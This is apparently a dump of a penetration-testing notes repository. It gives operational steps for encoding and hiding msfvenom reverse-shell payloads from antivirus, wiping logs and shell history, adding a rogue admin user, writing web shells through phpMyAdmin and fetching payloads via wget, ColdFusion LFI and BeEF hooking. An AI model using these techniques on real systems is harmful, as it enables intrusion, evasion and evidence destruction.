the `shikata_ga_nai` encoding. This is not that effective since antivirus-vendors have access to metasploit as well. 20 | 21 | ``` 22 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 -f exe -e 23 | x86/shikata_ga_nai -i 9 -o meterpreter_encoded.exe 24 | ``` 25 | 26 | ### Embed in non-malicious file 27 | 28 | Another way is to embed our payload in a non-malicious file. 29 | 30 | ``` 31 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 -f exe -e 32 | x86/shikata_ga_nai -i 9 -x calc.exe -o 33 | bad_calc.exe 34 | ``` 35 | 36 | ### Encrypting the malware 37 | 38 | In order to obfuscate our malware we can encrypt it, and thus radically changing the signature. One much mentioned tool for doing that is Hyperion. It is a windows binary but we can compile and run it from linux as well. This worked for me (october 2016) 39 | 40 | ``` 41 | wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip 42 | unzip Hyperion-1.2.zip 43 | i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe 44 | ``` 45 | 46 | In Kali you have hyperion 1 included. However for it to work you have to run it from it's correct path. So go to `/usr/share/veil-evasion/tools/hyperion` 47 | 48 | And run it like this 49 | 50 | ``` 51 | wine hyperion /path/to/file.exe encryptedfile.exe 52 | ``` 53 | -------------------------------------------------------------------------------- /clean_up.md: -------------------------------------------------------------------------------- 1 | # Cover your tracks 2 | 3 | http://www.dankalia.com/tutor/01005/0100501003.htm 4 | 5 | ## On Linux 6 | 7 | 8 | ### Log files 9 | 10 | 11 | `/etc/syslog.conf` 12 | 13 | In this file you can read all the logs that syslog log. 14 | 15 | 16 | On linux systems a lot of logs are stored in: 17 | 18 | 19 | ``` 20 | /var/logs 21 | ``` 22 | 23 | For example: 24 | ``` 25 | /var/log/messages 26 | ``` 27 | 28 | Here you have failed and successful login attempts. SSH, SUDO, and much more. 29 | 30 | ``` 31 | /var/log/auth.log 32 | ``` 33 | 34 | ### Apache 35 | 36 | ``` 37 | /var/log/apache2/access.log 38 | /var/log/apache2/error.log 39 | ``` 40 | 41 | Remove your own ip like this 42 | 43 | ``` 44 | grep -v '' /path/to/access_log > a && mv a /path/to/access_log 45 | ``` 46 | 47 | What it does is simply to copy all lines except the lines that contain your IP-address. And then move them, and them move them back again. 48 | 49 | ``` 50 | grep -v > /tmp/a ; mv /tmp/a ; rm -f /tmp/a 51 | ``` 52 | 53 | ### UTMP and WTMP 54 | 55 | These logs are not stored in plaintext but instead as binaries. Which makes it a bit harder to clear. 56 | 57 | ``` 58 | who 59 | ``` 60 | 61 | ``` 62 | last 63 | ``` 64 | 65 | ``` 66 | lastlog 67 | ``` 68 | 69 | ### Command history 70 | 71 | All your commands are also stored. 72 | 73 | ``` 74 | echo $HISTFILE 75 | echo $HISTSIZE 76 | ``` 77 | 78 | You can set your file-size like this to zero, to avoid storing commands. 79 | 80 | ``` 81 | export HISTSIZE=0 82 | ``` 83 | 84 | If you set it when you get shell you won't have to worry about cleaning up the history. 85 | 86 | ## Shred files 87 | 88 | Shredding files lets you remove files in a more secure way. 89 | 90 | ``` 91 | shred -zu filename 92 | ``` 93 | 94 | ## On windows 95 | 96 | Clear env 97 | https://www.offensive-security.com/metasploit-unleashed/event-log-management/ -------------------------------------------------------------------------------- /clickjacking.md: -------------------------------------------------------------------------------- 1 | # Clickjacking 2 | 3 | 4 | 5 | # References 6 | 7 | HackerOne issues 8 | https://hackerone.com/reports/109373 -------------------------------------------------------------------------------- /cmd.md: -------------------------------------------------------------------------------- 1 | # CMD - Windows commands 2 | 3 | 4 | The equivalent to the Linux command `;` as in 5 | 6 | ``` 7 | echo "command 1" ; echo "command 2" 8 | ``` 9 | 10 | is 11 | 12 | ``` 13 | dir & whoami 14 | ``` 15 | 16 | ### Dealing with files and stuff 17 | 18 | **Delete file** 19 | 20 | ``` 21 | del 22 | ``` 23 | 24 | **Create folder/directory** 25 | 26 | ``` 27 | md folderName 28 | ``` 29 | 30 | **Show hidden files** 31 | 32 | ``` 33 | dir /A 34 | ``` 35 | 36 | **Print out file content, like cat** 37 | 38 | ``` 39 | type file.txt 40 | ``` 41 | 42 | **grep files** 43 | 44 | ``` 45 | findstr file.txt 46 | ``` 47 | 48 | 49 | 50 | ### Network 51 | 52 | **Show network information** 53 | 54 | `netstat -an` 55 | 56 | **Show network adapter info** 57 | 58 | `ipconfig` 59 | 60 | **Ping another machine** 61 | 62 | `ping 192.168.1.101` 63 | 64 | **Traceroute** 65 | 66 | `tracert` 67 | 68 | 69 | ### Processes 70 | 71 | **List processes** 72 | 73 | `tasklist` 74 | 75 | **Kill a process** 76 | 77 | `taskkill /PID 1532 /F` 78 | 79 | ### Users 80 | 81 | ``` 82 | net users 83 | 84 | # Add user 85 | net user hacker my_password /add 86 | net localgroup Administrator hacker /add 87 | 88 | # Check if you are part of a domain 89 | net localgroup /domain 90 | 91 | # List all users in a domain 92 | net users /domain 93 | ``` 94 | 95 | ### Other 96 | 97 | **Shutdown** 98 | 99 | ``` 100 | # Shutdown now 101 | shutdown /s /t 0 102 | 103 | # Restart 104 | shutdown /r /t 0 105 | ``` 106 | 107 | **ciper - Clear data/shred** 108 | 109 | ``` 110 | Shreds the whole machine 111 | ciper /w:C:\ 112 | ``` 113 | 114 | **Show environmental variables** 115 | 116 | ``` 117 | set 118 | ``` 119 | 120 | **Show options for commands** 121 | 122 | The "man"-pages in windows is simply: 123 | ``` 124 | help dir 125 | ``` 126 | 127 | ### Mounting - Mapping 128 | 129 | In the windows world mounting is called mapping. 130 | 131 | If you want to see which drives are mapped/mounted to your file-system you can use any of these commands: 132 | 133 | ``` 134 | # This is the most thorough 135 | wmic logicaldisk get deviceid, volumename, description 136 | 137 | # But this works too 138 | wmic logicaldisk get name 139 | wmic logicaldisk get caption 140 | 141 | # This can be slow. So don't kill your shell! 142 | fsutil fsinfo drives 143 | 144 | # With powershell 145 | get-psdrive -psprovider filesystem 146 | 147 | # This works too, but it is interacive. So it might be dangerous work hackers 148 | diskpart 149 | list volume 150 | 151 | # Map only network drives 152 | net use 153 | ``` 154 | 155 | The command to deal with mounting/mapping is **net use** 156 | 157 | Using `net use` we can connect to other shared folder, on other systems. Many windows machines have a default-share called IPC (Interprocess communication share). It does not contain any files. But we can usually connect to it without authentication. This is called a **null-session**. Although the share does not contain any files it contains a lot of data that is useful for enumeration. 158 | The Linux-equivalent of `net use` is usually `smbclient`. 159 | 160 | 161 | ``` 162 | net use \\IP address\IPC$ "" /u:"" 163 | net use \\192.168.1.101\IPC$ "" /u:"" 164 | ``` 165 | 166 | If you want to map a drive from another network to your filesystem you can do that like this: 167 | 168 | ``` 169 | # This will map it to drive z 170 | net use z: \\192.168.1.101\SYSVOL 171 | 172 | # This will map it to the first available drive-letter 173 | net use * \\192.168.1.101\SYSVOL 174 | ``` 175 | 176 | Here you map the drive to the letter `z`. If the command is successful you should now be able to access those files by entering the `z` drive. 177 | 178 | You enter the z-drive by doing this: 179 | 180 | ``` 181 | C:\>z: 182 | Z:\ 183 | 184 | # Now we switch back to c 185 | Z:\>c: 186 | C:\ 187 | ``` 188 | 189 | ** Remove a network drive - umount it** 190 | 191 | First leave the drive if you are in it: 192 | 193 | ``` 194 | c: 195 | net use z: /del 196 | ``` 197 | 198 | 199 | # References and Stuff 200 | 201 | This might come in handy for the linux-users: http://www.lemoda.net/windows/windows2unix/windows2unix.html 202 | 203 | 204 | -------------------------------------------------------------------------------- /commands.md: -------------------------------------------------------------------------------- 1 | # Commands 2 | 3 | You can find all the commands in for metasploit here: 4 | 5 | https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/ 6 | 7 | I just want to highlight some really useful commands. 8 | 9 | ## setg 10 | With `setg` you can set global variables. Like instead of having to enter `set LHOST 192.168.1.101` for every payload and listener with `setg` those will be automatically filled in with your global values. You can enter `save` to save the global values so they persist from one session to the other. 11 | 12 | ## Populate RHOSTS from database 13 | 14 | This is an incredibly useful feature. 15 | 16 | First you choose the auxilary module. Then yo just do 17 | 18 | ``` 19 | services -p 139 --rhosts 20 | run 21 | ``` -------------------------------------------------------------------------------- /common_web-services.md: -------------------------------------------------------------------------------- 1 | # Common web-services 2 | 3 | This is a list of some common web-services. The list is alphabetical. 4 | 5 | ## Cold Fusion 6 | 7 | If you have found a cold fusion you are almost certainly struck gold. 8 | http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers 9 | 10 | ### Determine version 11 | 12 | example.com/CFIDE/adminapi/base.cfc?wsdl 13 | It will say something like: 14 | ``` 15 | 16 | ``` 17 | 18 | ### Version 8 19 | 20 | #### FCKEDITOR 21 | 22 | 23 | This works for version 8.0.1. So make sure to check the exact version. 24 | 25 | ``` 26 | use exploit/windows/http/coldfusion_fckeditor 27 | ``` 28 | 29 | #### LFI 30 | 31 | This will output the hash of the password. 32 | 33 | ``` 34 | http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en 35 | ``` 36 | 37 | You can pass the hash. 38 | 39 | http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers 40 | 41 | http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ 42 | 43 | neo-security.xml and password.properties 44 | 45 | ## Drupal 46 | 47 | ## Elastix 48 | 49 | Full of vulnerabilities. The old versions at least. 50 | 51 | http://example.com/vtigercrm/ 52 | default login is 53 | `admin:admin` 54 | 55 | You might be able to upload shell in profile-photo. 56 | 57 | ## Joomla 58 | 59 | ## Phpmyadmin 60 | 61 | Default credentials 62 | 63 | ``` 64 | root 65 | pma 66 | ``` 67 | 68 | If you find a phpMyAdmin part of a site that does not have any authentication, or you have managed to bypass the authetication you can use it to upload a shell. 69 | 70 | You go to: 71 | ``` 72 | http://192.168.1.101/phpmyadmin/ 73 | ``` 74 | 75 | Then click on SQL. 76 | 77 | ``` 78 | Run SQL query/queries on server "localhost": 79 | ``` 80 | From here we can just run a sql-query that creates a php script that works as a shell 81 | 82 | So we add the following query: 83 | 84 | ``` 85 | SELECT "" into outfile "C:\\xampp\\htdocs\\shell.php" 86 | 87 | # For linux 88 | SELECT "" into outfile "/var/www/html/shell.php" 89 | ``` 90 | 91 | The query is pretty self-explanatory. Now you just visit `192.168.1.101/shell.php?cmd=ipconfig` and you have a working web-shell. 92 | We can of course just write a superlong query with a better shell. But sometimes it is easier to just upload a simple web-shell, and from there download a better shell. 93 | 94 | ### Download a better shell 95 | 96 | On linux-machines we can use wget to download a more powerful shell. 97 | 98 | ``` 99 | ?cmd=wget%20192.168.1.102/shell.php 100 | ``` 101 | 102 | On windows-machines we can use tftp. 103 | 104 | ## Webdav 105 | 106 | Okay so webdav is old as hell, and not used very often. It is pretty much like ftp. But you go through http to access it. So if you have webdav installed on a xamp-server you can access it like this: 107 | 108 | ``` 109 | cadaver 192.168.1.101/webdav 110 | ``` 111 | 112 | Then sign in with username and password. 113 | The default username and passwords on xamp are: 114 | 115 | Username: **wampp** 116 | 117 | Password: **xampp** 118 | 119 | Then use **put** and **get** to upload and download. With this you can of course upload a shell that gives you better access. 120 | 121 | If you are looking for live examples just google this: 122 | 123 | ``` 124 | inurl:webdav site:com 125 | ``` 126 | 127 | 128 | Test if it is possible to upload and execute files with webdav. 129 | 130 | ``` 131 | davtest -url http://192.168.1.101 -directory demo_dir -rand aaaa_upfileP0C 132 | ``` 133 | 134 | If you managed to gain access but is unable to execute code there is a workaround for that! 135 | So if webdav has prohibited the user to upload .asp code, and pl and whatever, we can do this: 136 | 137 | upload a file called shell443.txt, which of course is you .asp shell. And then you rename it to **shell443.asp;.jpg**. Now you visit the page in the browser and the asp code will run and return your shell. 138 | 139 | ### References 140 | 141 | http://secureyes.net/nw/assets/Bypassing-IIS-6-Access-Restrictions.pdf 142 | 143 | ## Webmin 144 | 145 | Webmin is a webgui to interact with the machine. 146 | 147 | The password to enter is the same as the passsword for the root user, and other users if they have that right. There are several vulnerabilites for it. It is run on port 10000. 148 | 149 | 150 | ## Wordpress 151 | 152 | 153 | ``` 154 | sudo wpscan -u http://cybear32c.lab 155 | ``` 156 | 157 | If you hit a 403. That is, the request if forbidden for some reason. 158 | Read more here: https://en.wikipedia.org/wiki/HTTP_403 159 | 160 | It could mean that the server is suspicious because you don't have a proper user-agent in your request, in wpscan you can solve this by inserting --random-agent. 161 | You can of course also define a specific agent if you want that. But random-agent is pretty convenient. 162 | ``` 163 | sudo wpscan -u http://cybear32c.lab/ --random-agent 164 | ``` 165 | 166 | ### Scan for users 167 | 168 | You can use wpscan to enumerat users: -------------------------------------------------------------------------------- /compiling-windows-exploits.md: -------------------------------------------------------------------------------- 1 | Compiling exploits for windows on Linux can be a bit of a hassle. 2 | 3 | 4 | 5 | ``` 6 | i686-w64-mingw32-gcc exploit.c -o exploit 7 | ``` 8 | 9 | For 32bit 10 | 11 | ``` 12 | i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32 13 | ``` 14 | 15 | -------------------------------------------------------------------------------- /connections.md: -------------------------------------------------------------------------------- 1 | # Useful Scripts 2 | 3 | 4 | ## Make Request 5 | 6 | Sometimes we might want to make a request to a website programmatically. Instead of having to visit the page in the browser. In Python we can to it the following way. 7 | 8 | If you don't have the module requests installed you can install it like this. 9 | 10 | `pip install requests` 11 | 12 | ```python 13 | import requests 14 | 15 | req = requests.get("http://site.com") 16 | print req.status_code 17 | print req.text 18 | ``` 19 | 20 | ### Custom headers 21 | 22 | We might receive a `403` error if we don't include a user-agent. Or we might want to send a specific header. We can do that the following way. 23 | 24 | ```python 25 | import requests 26 | 27 | headers = { 28 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", 29 | "Accept-Encoding": "gzip, deflate, sdch", 30 | "Accept-Language": "en-US,en;q=0.8,es;q=0.6,sv;q=0.4", 31 | "Cache-Control": "max-age=0", 32 | "Connection": "keep-alive", 33 | "Cookie": "_gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1", 34 | "Host": "docs.python-requests.org", 35 | "If-Modified-Since": "Wed, 03 Aug 2016 20:05:34 GMT", 36 | "If-None-Match": 'W/"57a24e8e-e1f3"', 37 | "Referer": "https://www.google.com/", 38 | "Upgrade-Insecure-Requests": "1", 39 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36" 40 | } 41 | 42 | req = requests.get("http://site.com", headers=headers) 43 | print req.status_code 44 | print req.text 45 | ``` 46 | 47 | If you need to add an action, like loggin in or something like that, to your request you do the following: 48 | 49 | ```python 50 | values = {'action' : 'whatever'} 51 | req = requests.get("http://site.com", data=values, headers=headers) 52 | ``` 53 | 54 | Here is the documentation 55 | http://docs.python-requests.org/en/master/user/quickstart/ 56 | 57 | ## Read and write to files 58 | 59 | Many times we want to read through files and do stuff do it. This can of course be done using bash but we can also do it in python. It might be easier to parse text in python. 60 | 61 | ```python 62 | file_open = open("readme.txt", "r") 63 | for line in file_open: 64 | print line.strip("\n") 65 | if line.strip("\n") == "rad 4": 66 | print "last line" 67 | ``` 68 | 69 | 70 | ## Basic banner-grabber 71 | 72 | Here is an example of the most basic usage of the socket module. It connects to a port and prints out the response. 73 | 74 | ```python 75 | #!/user/bin/env python 76 | 77 | # Importing the socket module 78 | import socket 79 | 80 | # We use the socker() method of the module socket and store it in the variable s. 81 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 82 | 83 | # Here we use the connect method of the socket we created. The two arguments are pretty self-explanatory 84 | # The first is the adress the second is the port. 85 | s.connect(("192.168.1.104", 22)) 86 | 87 | # Here we save what the socket reviewed in the variable answer. 88 | answer = s.recv(1024) 89 | print answer 90 | 91 | # Send stuff. REMEMBER THE \r\n 92 | 93 | s.send("this is my message\r\n") 94 | print s.recv(1024) 95 | 96 | # Here we close the socket. 97 | s.close 98 | 99 | 100 | ``` 101 | 102 | If you need to check all 65535 ports this might take some time. If a packet is sent and recieved that makes it 65535 seconds, it translates into about 18 hours. So to solve that we can run the a function in new threads. 103 | 104 | ```python 105 | from multiprocessing.dummy import Pool as ThreadPool 106 | pool = ThreadPool(300) 107 | results = pool.map(function, array) 108 | ``` 109 | 110 | Read more about parallellism here: http://chriskiehl.com/article/parallelism-in-one-line/ 111 | 112 | ## Connecting to SMTP 113 | 114 | A crappy script to connect to a smtp-server and if you are allowed to test for users with VRFY it goes ahead and test for the users that you input from a file. 115 | One very important thing to note here, that had me stuck for quite a while is that you need to send the query strings in raw-format 116 | 117 | The `\r` here is fundamental!! 118 | 119 | ``` 120 | s.send('VRFY root \r\n') 121 | ``` 122 | 123 | 124 | ```python 125 | #!/usr/bin/python 126 | import socket 127 | import sys 128 | import time 129 | import re 130 | 131 | ips = [ 132 | "192.168.1.22", 133 | "192.168.1.72" 134 | ] 135 | 136 | users = ["root"] 137 | 138 | userfile = open("/fileWithUsernames.txt", "r") 139 | for line in userfile: 140 | user = line.strip("\n") 141 | users.append(user) 142 | 143 | 144 | for ip in ips: 145 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 146 | s.connect((ip, 25)) 147 | banner = s.recv(1024) 148 | 149 | print "****************************" 150 | print "Report for " + ip 151 | print banner 152 | s.send('VRFY root \r\n') 153 | answerUsername = s.recv(1024) 154 | answerAsArray = answerUsername.split(" ") 155 | 156 | if answerAsArray[0] == "502": 157 | print "VRFY failed" 158 | if answerAsArray[0] == "250": 159 | print "VRFY command succeeded.\nProceeding to test usernames" 160 | 161 | for username in users: 162 | time.sleep(5) 163 | s.send("VRFY " + username + "\r\n") 164 | 165 | answerUsername = s.recv(1024) 166 | answerUsernameArray = answerUsername.split(" ") 167 | print answerUsernameArray[0] 168 | if answerUsernameArray[0] == "250": 169 | print "Exists: " + username.strip("\n") 170 | else : 171 | print "Does NOT exist: " + username.strip("\n") 172 | if answerAsArray[0] == "252": 173 | print "FAILED - Cannot verify user" 174 | else: 175 | "Some other error or whatever here it is: \n" + answerUsername 176 | 177 | 178 | 179 | s.close() 180 | ``` 181 | 182 | ## Client/Server using sockets 183 | 184 | http://programmers.stackexchange.com/questions/171734/difference-between-a-socket-and-a-port -------------------------------------------------------------------------------- /create_shellcode.md: -------------------------------------------------------------------------------- 1 | # Generate shellcode 2 | 3 | An easy way to generate shellcode is by using `msfvenom` or `msconsole`. I mostly see people recommending msfvenom online, but I think msfconsole can be a bit easier to work with. But of course it is the same thing, just different interfaces. 4 | 5 | ## Msfconsole 6 | 7 | In msfconsole you have the keyword `generate` that help us generate shellcode. So first we have to select a payload. 8 | 9 | ``` 10 | use payload/windows/shell_reverse_tcp 11 | ``` 12 | 13 | Now we set the variables as usual 14 | 15 | ``` 16 | set LPORT 5555 17 | set LHOST 192.168.0.101 18 | ``` 19 | 20 | Now we genereate the shellcode using the command `generate`. 21 | 22 | To see the options use `generate -h` 23 | 24 | ## Single commands in windows 25 | 26 | If you don't have space and only want to execute a single command you can use 27 | 28 | ``` 29 | use payload/windows/exec 30 | 31 | use payload/cmd/windows/generic 32 | ``` 33 | 34 | -------------------------------------------------------------------------------- /creating_malicious_files.md: -------------------------------------------------------------------------------- 1 | # Creating malicious files 2 | 3 | Not all exploits in msf is connecting to your target. Sometimes metasploit can create the exploit and then you need to get the target to click on it. 4 | 5 | This of course require your target to have some vulnerability usually. 6 | 7 | If your target for example uses an old version of Adobe Acrobat we can create a exploit for that. 8 | 9 | ``` 10 | use exploit/windows/fileformat/adobe_utilprintf 11 | 12 | show options 13 | 14 | set payload windows/meterpreter/reverse_tcp 15 | exploit 16 | ``` 17 | 18 | So what we are doing here is first select the exploit, then we select what payload we want to have in that exploit. In this case we chose a reverse_tcp-shell. 19 | 20 | Now we need to set up a handler to recieve the connect-back. 21 | 22 | ``` 23 | use expoit/multi/handler 24 | set LHOST 192.168.1.102 25 | set LPORT 4444 26 | exploit 27 | ``` 28 | 29 | There, now we are up listening for the connect-back when the users clicks on the file. 30 | We can look at the advances options to make sure that the listener is not exiting when you recieve a connect-back. So that you can keep listening for more connect-backs. 31 | -------------------------------------------------------------------------------- /cross-site-scripting.md: -------------------------------------------------------------------------------- 1 | # Cross-site-scripting 2 | 3 | 4 | Cross-site-scripting, or XSS as it is sometimes abbreviated to, is an attack that let's the attacker execute javascript code in the browser of the victim. 5 | 6 | ## So, what's the worst that can happen? 7 | 8 | The attacker is probably not that interested in changing the color or font of the website the victim is visiting. Although s/he could do that. The worst that can happen is probably the following: 9 | 10 | 1. Complete control over the browser 11 | The attacker can access plugins. Like password managers. The attacker can trick the user into allowing webcam or audio. 12 | 13 | 2. Session-hijacking/Cookie theft 14 | This is when the attacker steals the cookie that is saved in the browser. Using this cookie the attacker can log in to the service as the victim, and thereby gain access to his/her account. If the victim is an admin that has extended privileges (uploading code, images, or whatever) this could lead to a compromise of the server itself. 15 | 16 | 3. Keylogger 17 | The attacker can execute a keylogging-script that steals everything the user inputs in the website. This could be used to steal sensitive information, like passwords, credit cards information, chatlogs or whatever the user inputs. 18 | 19 | 4. Phishing 20 | The attacker can insert a fake login. Image that you visit a site, and from that site you are able to login using your facebook or google-account. The attacker could spoof that so that when you enter your credentials, they are then sent to the attacker. 21 | 22 | 5. Browser exploits 23 | The script can redirect to a another page that issues an attack against the browser, possibly leading to total takeover of the machine. 24 | 25 | ### Types of XSS 26 | 27 | 1. Persistent 28 | This is when the malicious code originates from the websites database. That means the attacker has managed to insert malicious code into the database. So every time the database serve that data the script will me executed. this is probably the most dangerous XSS, since it does not need to rely on social engineering. 29 | 30 | 2. Reflected 31 | This is an attack where the script originates from the users request. This might seem a bit illogical, why would a user inject malicious code to himself? Well the code can 32 | 33 | 3. DOM based 34 | DOM-based attacks are when something is injected into javascript on the DOM. So, it does not go by the server. Because the code gets executed in the response. 35 | Take a search-functionality for example. The users enters a search-parameter that gets sent to the server which might sanitize it or something. In the response the found search-items are sent, but not the search-query. But on the webpage the search query is exposed. "You searched for X" is shown. That is because it gets the search parameter from the url-parameter. By using `document.location.href` for example. 36 | 37 | ## Beef 38 | 39 | Beef username/password: beef:beef 40 | Beef is a great tool for attacking browsers. 41 | 42 | After starting it up you can log in to the panel. Then you get someone to execute the hook. 43 | Hook URL: http://172.17.15.118:3000/hook.js 44 | UI URL: http://172.17.15.118:3000/ui/panel 45 | 46 | By injecting the hook into a XSS. Like this 47 | 48 | ```javascript 49 | 50 | ``` 51 | 52 | 53 | ### How does it really work? 54 | Let's look at a practical example. 55 | 56 | 57 | ### Protect yourself 58 | 59 | The problem with XSS is that it is a bit hard for the users to protect themselves. If there is a problem witht the website there is not that much the user can do. 60 | 61 | One can always use noscript to block all javascript code. But that pretty much destroys the whole experience with using the internet. 62 | 63 | ### Protect your website 64 | 65 | There are mainly two ways to protect against ** encoding ** and ** sanitizing **. 66 | 67 | #### Encoding 68 | 69 | 70 | Of course the way to protect your website is to sanitize all input. 71 | 72 | You can also set the response-header like this: 73 | `-xss-protection:"1; mode=block"` 74 | 75 | For nodeJs you can use the helmet-module to do this. 76 | https://www.npmjs.com/package/helmet 77 | 78 | 79 | ### Risks for the attacker 80 | The obvious risk is that the attacker must expose a server. 81 | 82 | ### Tools 83 | 84 | #### XSSER 85 | 86 | This tool tests a lot of 87 | 88 | `xsser --gtk` 89 | 90 | 91 | #### Xssposed 92 | This is a tool found in recon-ng. It basically just check this (https://www.openbugbounty.org/ 93 | ) database to see if anyone has reported a xss for the website. 94 | 95 | 96 | 97 | 98 | 99 | ###References: 100 | 101 | http://brutelogic.com.br/blog/probing-to-find-xss/ 102 | http://excess-xss.com/ 103 | 104 | -------------------------------------------------------------------------------- /cross_site_request_forgery.md: -------------------------------------------------------------------------------- 1 | # Cross Site Request Forgery 2 | 3 | Cross site Request Forgery (CSRF) attacks forces the user to perform action the he did not intend to perform. This usually (only?) possible by creating a malicious URL-address that the victim executes in his browser, while he is logged in. 4 | 5 | ## What's the worst that can happen? 6 | 7 | The attacker can make actions for the user. For example change the email-address, make a purchase, or something like that. So it could be used to change the adress, and reset the password by sending an email. 8 | 9 | 10 | ## How to perform it? 11 | 12 | 1. Investigate how the website works 13 | First you need to know how the application works. What the endpoints are. 14 | 15 | 2. Construct your malicious URL 16 | Now you just construct the URL. Either using get or post. 17 | 18 | - `GET` 19 | If you use only `GET` you can construct the URL like this: 20 | 21 | http://example.com/api/createUser?name=Jose 22 | 23 | - `POST` 24 | 25 | If the requests are sent as `POST` you need to make the victim run a link that where you control the server. So that you can add the arguments in the body. 26 | 27 | There is one creat trick for this. It is to use the image-tag. Because the image-tag can be used to automatically retrieve information from other sites. If you have an image on your site but it is referenced to 28 | 29 | `` 30 | 31 | 32 | ## Protection 33 | 34 | The only real solution is to use unique tokens for each request. 35 | 36 | 37 | 38 | ### References 39 | 40 | 41 | http://tipstrickshack.blogspot.cl/2012/10/how-to-exploit-csfr-vulnerabilitycsrf.html 42 | 43 | https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005) 44 | 45 | https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) -------------------------------------------------------------------------------- /dGaQO6Y.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/dGaQO6Y.png -------------------------------------------------------------------------------- /database.md: -------------------------------------------------------------------------------- 1 | # Database 2 | 3 | Working with the database that is connected to metasploit is great. 4 | 5 | 6 | ``` 7 | workspace 8 | workspace -a nameOfNewWorkspace #Add 9 | workspace -d nameOfNewWorkspace #Delete 10 | ``` 11 | 12 | 13 | ``` 14 | hosts 15 | ``` 16 | 17 | ``` 18 | services 19 | ``` -------------------------------------------------------------------------------- /default_layout_apache_on_different_versiont.md: -------------------------------------------------------------------------------- 1 | # Default Layout of Apache on Different Versions 2 | 3 | 4 | Really useful if you want to know what the root-folder is for an apache install: 5 | 6 | https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29: -------------------------------------------------------------------------------- /dictionary_attacks.md: -------------------------------------------------------------------------------- 1 | # Dictionary Attacks 2 | 3 | ## Burp suite 4 | Intercept the login request 5 | Rightclick - Send to intruder 6 | -------------------------------------------------------------------------------- /directory-traversal-attack.md: -------------------------------------------------------------------------------- 1 | ## Directory Traversal Attack 2 | 3 | When the attacker is able to read files on the filesystem. 4 | 5 | Differ from LFI in the aspect that LFI can execute code, while a Directory Traversal Attack cannot. 6 | 7 | -------------------------------------------------------------------------------- /dns-spoofing.md: -------------------------------------------------------------------------------- 1 | # DNS-spoofing 2 | 3 | This attack can also me called DNS cache posining. 4 | This attack is also performed on a already compromised network. It is pretty much like Arp-spoofing. But instead of relying traffic we are directing the user to visit a fake web-site that we have set up. 5 | 6 | We set up a webpage that is a clone of facebook.com. We intercept the dns-traffic, and everytime the target sends a request to a dns-server to resolve facebook.com we intercept that request and directs the user to our clone. -------------------------------------------------------------------------------- /dns_basics.md: -------------------------------------------------------------------------------- 1 | # DNS Basics 2 | 3 | 4 | This is the best article I have found about how the DNS-system works. Form the highest to the lowest level. 5 | 6 | [An introduction to dns-terminology components and concepts](https://www.digitalocean.com/community/tutorials/an-introduction-to-dns-terminology-components-and-concepts) 7 | 8 | Before we begin to look at the specific techniques that exists to find subdomains, lets try to understand what subdomains are and how they work. 9 | 10 | ** A - records ** 11 | 12 | A stands for **address**. 13 | 14 | The A record maps a name to one or more IP addresses, when the IP are known and stable. 15 | So that would be 123.244.223.222 => example.com 16 | 17 | **AAAA** - points to a IPv6 Record 18 | 19 | ** CNAME ** 20 | 21 | The CNAME record connects a name to another name. An example of that would be: 22 | 23 | ``` 24 | www.example.com,CNAME,www.example.com.cdn.cloudflare.net. 25 | ``` 26 | 27 | Another example is. If you have the domains mail.example.com and webmail.example.com. You can have webmail.example.com point to mail.example.com. So anyone visiting webmail.example.com will see the same thing as mail.example.com. It will NOT redirect you. Just show you the same content. 28 | 29 | Another typical usage of CNAME is to link www.example.com to example.com 30 | 31 | CNAME is quite convenient. Because if you change the A-record. The IP-address, you don't need to change the other subdomains, like ftp.example.com or www.example.com. Since they both point to example.com, which is a A-record and points directly to the IP. 32 | 33 | Another note. 34 | If foo.example.com points to bar.example.com, that mean that bar.example.com is the CNAME (Canonical/real/actual Name) of foo.example.com. 35 | 36 | 37 | 38 | ** Alias ** 39 | 40 | Kind of like CNAME in that it points to another name, not an IP. 41 | 42 | ** MX - Mail exchange ** 43 | 44 | https://en.wikipedia.org/wiki/MX_record 45 | -------------------------------------------------------------------------------- /dns_zone_transfer_attack.md: -------------------------------------------------------------------------------- 1 | # DNS Zone Transfer Attack 2 | 3 | Sometimes DNS servers are misconfigured. The DNS server contains a Zone file which it uses to replicate the map of a domain. They should be configured so that only the replicating DNS-server can access it, but sometimes it is misconfigured so anyone can request the zone file, and thereby recieve the whole list of subdomains. This can be done the following way: 4 | 5 | 6 | To do this we first need to figure out which DNS-servers a domain has. 7 | 8 | ``` 9 | host -t ns wikipedia.com 10 | ``` 11 | 12 | ``` 13 | host -l wikipedia.com ns1.wikipedia.com 14 | ``` 15 | 16 | This can also be done with tools such as dnsrecon and dnsenum. 17 | 18 | https://security.stackexchange.com/questions/10452/dns-zone-transfer-attack -------------------------------------------------------------------------------- /dom-based-xss.md: -------------------------------------------------------------------------------- 1 | ## DOM-based XSS 2 | 3 | In DOM-based XSS the malicious code is never sent to the server. The injection-point is somewhere where javascript has access. 4 | 5 | The typical example of how this works is with URLs. 6 | 7 | The user is able to control the URL with the help of the hash-symbol `#`. If we add that symbol to a URL the browser will not include that characters that comes after it in the requet to the server. 8 | 9 | ``` 10 | https://example.com/#this_is_not_sent_to_server 